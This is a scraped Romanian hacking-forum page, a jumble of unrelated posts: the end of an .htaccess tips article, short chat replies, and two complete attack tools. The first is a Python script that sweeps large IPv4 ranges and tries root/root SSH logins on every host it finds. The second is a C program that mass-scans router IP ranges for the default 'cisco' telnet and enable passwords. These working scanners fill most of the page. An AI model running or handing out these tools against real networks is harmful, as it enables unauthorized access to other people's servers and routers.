^cgi-script$ mod_gzip_item_include mime ^text\.* mod_gzip_item_include mime ^application/x-javascript.* mod_gzip_item_exclude mime ^image\.* mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.* </IfModule> 4. Protect Your Site against Hotlinking If you don’t want your images hotlinked, add this to your .htaccess file: RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?yourdomain.com [NC] RewriteRule \.(jpg|jpeg|png|gif)$ - [NC,F,L] Just replace yourdomain.com with your own and you are good to go. 5. Blocking Visitors Referred from a Particular Domain If you have users from a particular domain you don’t welcome, you can ban them from your site. For instance, if your site gets listed in a place you don’t want traffic from (i.e. adult sites, blackhat sites, etc.), you can serve them with a 403 Forbidden page. You need to have mod_rewrite enabled but since it is usually on, you should be fine. Add this snippet: <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_REFERER} bannedurl1.com [NC,OR] RewriteCond %{HTTP_REFERER} bannedurl2.com [NC,OR] RewriteRule .* - [F] </ifModule> You need to replace bannedurl1.com and bannedurl2.com etc. with the domain names you want to blacklist. You may want to use the [NC] flag because it specifies that the domain name you’ve entered isn’t case sensitive. The [F] flag specifies the action to take – in this case to show the 403 Forbidden error. If you want to ban multiple sites, use the [NC,OR] flag for every domain but the last and if you want to ban a single domain use only the [NC] flag. 6. Blocking Requests from Particular User Agents If your log files show particular user agents (bots or spiders) you can add a few lines to .htaccess and deny them access to your site: RewriteEngine On RewriteBase / SetEnvIfNoCase Referer "^$" bad_user SetEnvIfNoCase User-Agent "^badbot1" bad_user SetEnvIfNoCase User-Agent "^badbot2" bad_user SetEnvIfNoCase User-Agent "^badbot3" bad_user Deny from env=bad_user Replace badbot1, badbot1, etc. with the names of bots from your log files. This should keep such programs away from your site. 7. Caching Files Another way to speed your site’s load times is via file caching. Here is what you need to add in order to cache files: <FilesMatch ".(flv|gif|jpg|jpeg|png|ico|swf|js|css|pdf)$"> Header set Cache-Control "max-age=2592000" </FilesMatch> You can add more file types (or remove some of them) to the sequence of files listed in this example – do what suits you. You can also use max-age to specify the amount of time in seconds that your files will live in the cache. 8. Disabling Caching for Particular File Types If you don’t want to cache particular file types, it is easier not to include them in the cache sequence. However, sometimes files might get cached even if you you don’t explicitly list them there and in this case you may want to disable caching only for them. Most often you will want to disable caching for dynamic files, such as scripts. Here is how to do it: <FilesMatch ".(pl|php|cgi|spl|scgi|fcgi)$"> Header unset Cache-Control </FilesMatch> Just pipe the files you want caching disabled for and this is it. 9. Bypassing the Download Dialogue By default, when you try to download a file from a Web server, you get a dialogue that asks you if you want to save the file or open it. This dialogue is especially irritating with large media files or PDFs. If the files you have uploaded to your server are for downloads, you can save users the trouble and proceed straight to download. Here is what you need to set in .htaccess: AddType application/octet-stream .pdf AddType application/octet-stream .zip AddType application/octet-stream .mp3 10. Renaming an .htaccess File If for some reason, mostly security-related, you want to rename your .htaccess file, it is very easy to do it. In theory, renaming an .htaccess file shouldn’t cause problems with the applications running on your server but if by chance you notice such issues after you rename the file, just rename it back to its original name. AccessFileName htac.cess You also need to update any entries in the file itself or everywhere .htaccess is mentioned, otherwise you will be getting lots of errors. 11. Changing a Default Index Page If you want your index page to be something different from the default index.html, index.php, index.htm, etc. this is very easy to do. Here is what you need to add to .htaccess: DirectoryIndex mypage.html Replace mypage.html with the actual URL of the page you want to use as index and you are done. 12. Redirecting to a Secure https Connection If you are using https and you want to redirect users to the secure pages of your site, use this: RewriteEngine On RewriteCond %{HTTPS} !on RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} 13. Restricting File Upload Limits in PHP, Maximum Size of Post Data, Max Script Execution Time, etc. .htaccess allows you to set some values that directly affect your PHP applications. For instance, if you want to impose upload limits in PHP, so that you don’t run out of hosting space because of large files, use this: php_value upload_max_filesize 15M Of course, you can set the value to anything you deem appropriate – 15M (MB) in this example isn’t fixed in stone. You can also restrict the maximum post size for uploading in PHP, To do it, add this: php_value post_max_size 10M Similarly, you can change 10M to any value that suits you. If you don’t want scripts to execute forever, you can limit their execution time with the help of the following: php_value max_execution_time 240 240 is the number of seconds before the script will be terminated and as you guess, it could be any value. Finally, if you want to limit the time a script can parse input data, use this: php_value max_input_time 180 And set any value in seconds that suits you. 14. Disguising File Types Sometimes you wouldn’t like users, to know the file types of the files on your site. One way to hide this information is if you disguise them. For instance, you can make all your files look as if they are HTML or PHP files: ForceType application/x-httpd-php ForceType application/x-httpd-php There is much more that can be done with .htaccess. For instance, you can set automatic translation of your site’s pages, or set the server timezone, or remove the www from URLs, or use fancy directory listings, etc. In any case, before you start experiments with .htaccess, always backup the original .htaccess, so if things don’t go as planned, you have a working copy to revert to. Source

si ce cauta la programare?

un pm si la mine cu mai multe detalii se poate?

@bahaoss sã nu abuzeze to?i gu?terii de ele

sshscan is a horizontal SSH scanner that scans large swaths of IPv4 space for a single SSH user and pass. It uses iplist.txt as the input of IP addresses in the form of X.X.X.X, X.X.X.X/XX, X.X.X.X-X.X.X.X, or X.X.X.X-X with X-X in any octet. sshscan.py #!/usr/bin/env python # sshscan.py 0.9 - Horizontal SSH scanner # by dual (whenry) # # sshscan.py is a horizontal SSH scanner that scans large # swaths of IPv4 space for a single SSH user and pass. It # uses iplist.txt as the input of IP addresses in the form # of X.X.X.X, X.X.X.X/XX, X.X.X.X-X.X.X.X, or X.X.X.X-X with # X-X in any octect. # # Usage: python -u sshscan.py # # IP country database: # http://geolite.maxmind.com/download/geoip/database/GeoIPCountryCSV.zip # # #!/bin/bash # grep -i "$1" GeoIPCountryWhois.csv | awk -F, '{print $1"-"$2}' | sed -e 's/"//g' > iplist.txt # # checkServer function by Brad Peters - brad (at) endperform (dot) org # ipRange function from http://cmikavac.net/2011/09/11/how-to-generate-an-ip-range-list-in-python/ # # SSH with pexpect example: # http://linux.byexamples.com/archives/346/python-how-to-access-ssh-with-pexpect/ # # ---------------------------------------------------------------------------- # "THE BEER-WARE LICENSE" (Revision 42): # dual (@getdual) wrote gallerycgi. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a beer in return. dual # ---------------------------------------------------------------------------- import datetime, netaddr, os, pexpect, random, re, socket, sys # Define connection string, user, and pass CNNX = 'Are you sure you want to continue connecting' USER = 'root' PASS = 'root' # Convert an IP range into start and end IPs def rangeStr(testip): start_ip = [] end_ip = [] matchAll = re.search('(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})', testip) for i in range(1, 5): matchRange = re.search('(\d{1,3})\-(\d{1,3})', matchAll.group(i)) if matchRange: start_ip.append(matchRange.group(1)) end_ip.append(matchRange.group(2)) else: start_ip.append(matchAll.group(i)) end_ip.append(matchAll.group(i)) start_ip_str = ".".join(map(str, start_ip)) end_ip_str = ".".join(map(str, end_ip)) return start_ip_str, end_ip_str # Generate an IP list given the first and last IPs def ipRange(start_ip, end_ip): start = list(map(int, start_ip.split("."))) end = list(map(int, end_ip.split("."))) temp = start ip_range = [] ip_range.append(start_ip) while temp != end: start[3] += 1 for i in (3, 2, 1): if temp[i] == 256: temp[i] = 0 temp[i-1] += 1 ip_range.append(".".join(map(str, temp))) return ip_range # Checks the SSH port def checkServer(ip_from_list): serverSocket = socket.socket() serverSocket.settimeout(0.5) try: serverSocket.connect((ip_from_list, 22)) except socket.error: return 1 # Attempt to connect to SSH def cnnxAttempt(target): child = pexpect.spawn('ssh %s@%s uname -a' % (USER, target)) try: i = child.expect([CNNX, '[Pp]assword: ', pexpect.EOF]) if i == 0: print "Sending 'yes'..." child.sendline('yes') i = child.expect([CNNX, '[Pp]assword: ', pexpect.EOF]) if i == 1: print "Sending password...", child.sendline(PASS) child.expect(pexpect.EOF, timeout=5) elif i == 2: print "Connection failed" pass # Print output print child.before output.write(child.before) except: print "Unexpected error:", sys.exc_info()[0] # Get date for output file today = datetime.datetime.now() date = today.strftime("%Y%m%dT%H%M") output_filename = 'sshscan-output-' + date + '.txt' input = open('iplist.txt', 'r') output = open(output_filename, 'w') # Randomize lines in input file rand_lines = input.readlines() random.shuffle(rand_lines) # Get total number of lines total_lines = len(rand_lines) count_lines = 0 # Iterate through IPs and check SSH for line in rand_lines: count_lines += 1 newline = line.strip() match_comments = re.search('^#', newline) if match_comments: continue match_ip = re.search('^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', newline) if match_ip: # If status is defined, we know the connection failed status = checkServer(newline) if status: print "%d/%d \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, newline) else: print "%d/%d \tHost: %s \tPort: 22/open" % (count_lines, total_lines, newline) output.write('Host: ' + newline + '\tPort: 22/open\n') cnnxAttempt(newline) match_cidr = re.search('\/\d{1,2}$', newline) if match_cidr: # Randomize lines in netblocks ip_list = netaddr.IPNetwork(newline) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.(0|255)$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) match_dash = re.search('\d-\d', newline) if match_dash: match_whole = re.search('(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})-(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', newline) if match_whole: ip_list = ipRange(match_whole.group(1), match_whole.group(2)) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.0|255$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) else: first_ip, last_ip = rangeStr(newline) ip_list = ipRange(first_ip, last_ip) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.0|255$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) output.close() Source

Compact mass scanner for Cisco routers with default telnet/enable passwords. README /* Author: OverIP Andrea Piscopiello overip at gmail.com Source: OCS v 0.2 License: GPL This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Email: Write me for any problem or suggestion at: overip at gmail.com Date: 01/10/13 Read me: Just compile it with: gcc ocs.c -o ocs -lpthread Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy xxx.xxx.xxx.xxx=range start IP yyy.yyy.yyy.yyy=range end IP PAY ATTENTION: This source is coded for only personal use on your own router Cisco. Don't hack around. Special thanks to: Khlero with your patience this code is out there Shen139, without you I can't live people that helped betatesting this code Alex Kah and his Cisco Router I love U all */ ocs.c #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/ioctl.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> #include <signal.h> int i=0; int j=0; int k=0; int l=0; char buffer_a[700]; char buffer_b[700]; char buffer_c[700]; char tmpIP[16]; pthread_t threadname; void callScan() // scanning { scanna(tmpIP); pthread_exit(0); } static void funcAlarm() //alarm { pthread_exit(0); } int setnonblock(int sock) //setta socket non bloccanti { struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout))) return 0; return 1; } void init(struct sockaddr_in *address,int port,int IP) { address->sin_family=AF_INET; address->sin_port=htons((u_short)port); address->sin_addr.s_addr=IP; } int scanna(char*rangeIP) //scanning { int error; int sd; struct sockaddr_in server; close(sd); server.sin_family=AF_INET; server.sin_port=htons(23); server.sin_addr.s_addr=inet_addr(rangeIP); sd=socket(AF_INET,SOCK_STREAM,0); if(sd==-1) { printf("Socket Error(%s)\n",rangeIP); close(sd); pthread_exit(0); } // setnonblock(sd); signal(SIGALRM,funcAlarm); alarm(7); fflush(stdout); error=connect(sd,(struct sockaddr*)&server,sizeof(server)); if(error==0) { printf("\n\n-%s\n",rangeIP); fflush(stdout); memset(buffer_c, '\0',700); recv(sd,buffer_c,700,0); printf(" |Logging... %s\n",rangeIP); fflush(stdout); memset(buffer_a, '\0',700); memset(buffer_b, '\0',700); send(sd,"cisco\r",6,0); sleep(1); recv(sd,buffer_a,700,0); if(strstr(buffer_a,"#")) printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP); else if(strstr(buffer_a,">")) { printf(" |Default Telnet password found. %s\n",rangeIP); fflush(stdout); send(sd,"enable\r",7,0); sleep(1); send(sd,"cisco\r",6,0); sleep(1); recv(sd,buffer_b,700,0); //printf(" Sto cercando di loggarmi in enable mode\n"); //fflush(stdout); } if(strstr(buffer_b,"#")) printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP); else printf(" |Router not vulnerable. \n"); fflush(stdout); } else { printf("\n\n(%s) Filtered Ports\n",rangeIP); close(sd); alarm(0); signal(SIGALRM,NULL); pthread_exit(0); } close(sd); fflush(stdout); alarm(0); signal(SIGALRM,NULL); pthread_exit(0); } char *getByte(char *IP,int index); int function1(char* IP, char* IP2) { char rangeIP[16]; pid_t pid; i=atoi(getByte(IP,1)); j=atoi(getByte(IP,2)); k=atoi(getByte(IP,3)); l=atoi(getByte(IP,4)); while(1) { sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l); strcpy(tmpIP,rangeIP); if(pthread_create(&threadname, NULL,callScan,NULL)!=0) { printf("+ Thread error:\n"); perror(" - pthread_create() "); exit(0); } fflush(stdout); pthread_join(threadname, NULL); fflush(stdout); l++; if (l==256) { l=0; k++; if (k==256) { k=0; j++; if (j==256) { j=0; i++; } } } if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4))) { break; } } sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l); strcpy(tmpIP,rangeIP); fflush(stdout); if(pthread_create(&threadname, NULL,callScan,NULL)!=0) { printf("+ Thread error:\n"); perror(" - pthread_create() "); exit(0); } pthread_join(threadname, NULL); fflush(stdout); } int main(int argc,char *argv[]) { int w; printf("********************************* OCS v 0.2 **********************************\n"); printf("**** ****\n"); printf("**** coded by OverIP ****\n"); printf("**** overip at gmail.com ****\n"); printf("**** under GPL License ****\n"); printf("**** ****\n"); printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n"); printf("**** ****\n"); printf("**** xxx.xxx.xxx.xxx = range start IP ****\n"); printf("**** yyy.yyy.yyy.yyy = range end IP ****\n"); printf("**** ****\n"); printf("******************************************************************************\n"); if(argc!=3) { printf("use: %s IP IP\n",argv[0]); exit(-1); } for(w=1;w<=5;w++) if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255) { printf("use: ./OCS IP IP\n"); exit (-1); } for(w=1;w<=5;w++) if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w))) { function1(argv[1],argv[2]); return 0; } else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w))) { printf("use: %s IP IP\n",argv[0]); return 0; } printf("Same IPs \n"); fflush(stdout); scanna(argv[1]); return 0; } char *getByte(char *IP,int index) { int i=0; int separator=0; static char byte[3]; for(i=0;i<4;i++) byte[i]='\0'; memset(byte,0,sizeof(byte)); for(i=0;i<strlen(IP);i++) { if((IP[i]=='.') && (separator==index-1)) { return byte; } else if(IP[i]=='.') { separator++; } else if (separator==index-1) { strncat(byte,&IP[i],1); } } return byte; } Source

deci ce face mai exact? fi mai explicit te rog, nu inteleg... intreb, nu aruncati cu pietre....

pai ce face?

descriere ?! ce face mai exact ca sa nu mor prost extras din regulament meri?i warn

https://rstforums.com/forum/25915-more-psd-html-tutorials.rst

Deep Freeze, by Faronics

Is Li-Fi, a method of transmitting data wirelessly using LED, the answer to the world's problem of congested bandwidth? sursa: youtube

nici eu nu sunt de acord sa astept un minut jumatate pentru a se incarca o pagina

Libertate !!!